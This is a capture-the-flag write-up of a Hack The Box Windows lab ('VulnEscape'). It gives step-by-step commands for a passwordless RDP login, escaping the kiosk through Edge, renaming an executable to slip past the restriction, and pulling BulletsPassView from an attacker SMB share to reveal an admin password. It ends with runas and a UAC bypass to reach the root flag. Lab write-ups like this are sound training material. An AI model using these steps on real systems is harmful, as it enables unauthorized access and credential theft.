Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/VulnEscape]
└─$ nmap -sC -sV -Pn 10.129.234.51 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-09 15:51 UTC
Nmap scan report for 10.129.234.51
Host is up (0.36s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| Not valid before: 2025-10-08T04:50:44
|_Not valid after: 2026-04-09T04:50:44
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
|_ System_Time: 2025-10-09T04:53:12+00:00
|_ssl-date: 2025-10-09T04:53:20+00:00; -10h59m07s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -10h59m07s, deviation: 0s, median: -10h59m08s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.30 seconds
The only open port is remote desktop (RDP)
RDP - TCP 3389
I still don't have any valid credit, so I would try to connect without any credit
┌──(wither㉿localhost)-[~/Templates/htb-labs/Easy/VulnEscape]
└─$ xfreerdp /v:10.129.234.51 /dynamic-resolution +clipboard -sec-nla
![[Pasted image 20251009155620.png]]
Then we can find it hints a username KioskUser0, I guess the password would be the username
KioskUser0:KioskUser0or even don't have any password.
I would try to connect it by these credits
Now we can use KioskUser0:'' to access
![[Pasted image 20251009160038.png]]
I have tried to press the screen, but nothing worked.Then I press Windowsbutton, it pops the start menu:
![[Pasted image 20251009170111.png]]
I have to use cmdandpowershell, but nothing worked here
![[Pasted image 20251009170145.png]]
Then I would try to find edge
![[Pasted image 20251009170158.png]]
It can pop successfully
![[Pasted image 20251009170221.png]]
Then I would direct to C:\from the browser
![[Pasted image 20251009170305.png]]
We can find the user.txtfrom Desktop of kiosk
![[Pasted image 20251009170348.png]]
Then I would try to find thecmd.exe
![[Pasted image 20251009170647.png]]
I would press it and download it ![[Pasted image 20251009170722.png]] It means the restriction notice, the operation has been canceled due to system restriction.
Actually if we change the name of this file, then it would run normally ![[Pasted image 20251009170933.png]] But it still not worked here.
So I guess only some of name could be run, we have known edge could be run normally
![[Pasted image 20251009171149.png]]
Change into myedge.exeit would run normally
Privilege escalation
There’s not much interesting in the KioskUser0 user’s home directory:
PS C:\Users\kioskUser0> tree /f .
Folder PATH listing
Volume serial number is 00000040 4A4B:52B4
C:\USERS\KIOSKUSER0
├───3D Objects
├───Contacts
├───Desktop
│ Microsoft Edge.lnk
│ user.txt
│
├───Documents
├───Downloads
│ msedge.exe
│
├───Favorites
├───Links
│ Desktop.lnk
│ Downloads.lnk
│
├───Music
├───Pictures
│ ├───Camera Roll
│ └───Saved Pictures
├───Saved Games
├───Searches
└───Videos
At the root of C:, it shows only very standard folders:
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/3/2024 3:11 AM inetpub
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 4/10/2025 11:29 PM Program Files
d-r--- 2/3/2024 3:03 AM Program Files (x86)
d-r--- 2/3/2024 3:43 AM Users
d----- 6/24/2025 1:24 PM Windows
_admin is interesting
PS C:\_admin> ls
Directory: C:\_admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/3/2024 3:04 AM installers
d----- 2/3/2024 3:05 AM passwords
d----- 2/3/2024 3:05 AM temp
-a---- 2/3/2024 3:03 AM 0 Default.rdp
-a---- 2/3/2024 3:04 AM 574 profiles.xml
profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
That password seems like a hash
There is an admin user on this machine:
PS C:\> net user
User accounts for \\ESCAPE
-------------------------------------------------------------------------------
admin Administrator DefaultAccount
Guest kioskUser0 WDAGUtilityAccount
The command completed successfully.
In the directory C:\Program Files (x86), there is a Remote Desktop Plus
PS C:\Program Files (x86)> ls
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 1:31 AM Common Files
d----- 6/24/2025 1:19 PM Internet Explorer
d----- 2/3/2024 3:14 AM Microsoft
d----- 12/7/2019 1:31 AM Microsoft.NET
d----- 2/3/2024 3:03 AM Remote Desktop Plus
d----- 6/24/2025 10:10 AM Windows Defender
d----- 2/3/2024 3:07 AM Windows Mail
d----- 6/24/2025 10:10 AM Windows Media Player
d----- 6/24/2025 1:19 PM Windows Multimedia Platform
d----- 12/7/2019 1:50 AM Windows NT
d----- 6/24/2025 10:10 AM Windows Photo Viewer
d----- 6/24/2025 1:19 PM Windows Portable Devices
d----- 12/7/2019 1:31 AM WindowsPowerShell
We can try to run it ![[Pasted image 20251009171657.png]]
We can import the profile.xmlhere, but it only access to Download, so let's move it to here
PS C:\> copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\
![[Pasted image 20251009171733.png]]
But the password is still hidden by bullets ![[Pasted image 20251009171840.png]]
If I try to copy the password, it pops another error in Korean: ![[Pasted image 20251009171906.png]]
There’s a utility named BulletsPassView from NirSoft that will show what characters are hidden behind bullets on a Windows system.
I’ll start a SMB server on my host and upload it to the target machine
smbserver.py share $(pwd) -smb2support -username wither -password wither
Then mount the share and run it
PS C:\> net use \\10.10.14.79\share /u:wither wither
The command completed successfully.
PS C:\> copy \\10.10.14.79\share\BulletsPassView.exe C:\Users\kioskUser0\Downloads\
PS C:\> C:\Users\kioskUser0\Downloads\BulletsPassView.exe
Then we can find the password Twisting3021
![[Pasted image 20251009172121.png]]
I have tried to use RDPconnect it, but it not worked
![[Pasted image 20251009172157.png]]
It said:
To log in remotely, you must have permission to log in through Remote Desktop Services. By default, members of the Remote Desktop Users group have this permission. If the group you currently belong to does not have this permission, or if this permission has been removed from the Remote Desktop Users group, you must be granted this permission manually.
After checking the group config
PS C:\> net user admin
User name admin
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/3/2024 3:45:01 AM
Password expires Never
Password changeable 2/3/2024 3:45:01 AM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/10/2025 11:26:42 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
VulnEscape must be configured to not allow with only Administrators group.
Now we can try to use runasto do that
PS C:\> runas /user:admin powershell
Enter the password for admin:
Attempting to start powershell as user "ESCAPE\admin" ...
![[Pasted image 20251009172308.png]]
But this shell is missing the full Administrator privileges:
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
It would be blocked by UAC
If we want to bypass it, we can run start-process powershell.exe -verb runas. This pops the interactive UAC dialog:
![[Pasted image 20251009172840.png]]
Then press the left button, we can get another powershell terminal
![[Pasted image 20251009172854.png]]
This shell has full privs:
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
Now you can read the root flag
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/3/2024 9:07 AM 2332 Microsoft Edge.lnk
-ar--- 10/8/2025 9:51 PM 34 root.txt
Description
VulnEscape is an Easy Windows machine: Log in via default RDP as KioskUser0 without a password. Edge's file:// bypass allows browsing the file system and opening PowerShell in a restricted environment. After discovering and loading the Remote Desktop Plus configuration file, BulletsPassView extracts the password. This password is used to log in as admin, bypass UAC, and read the root flag.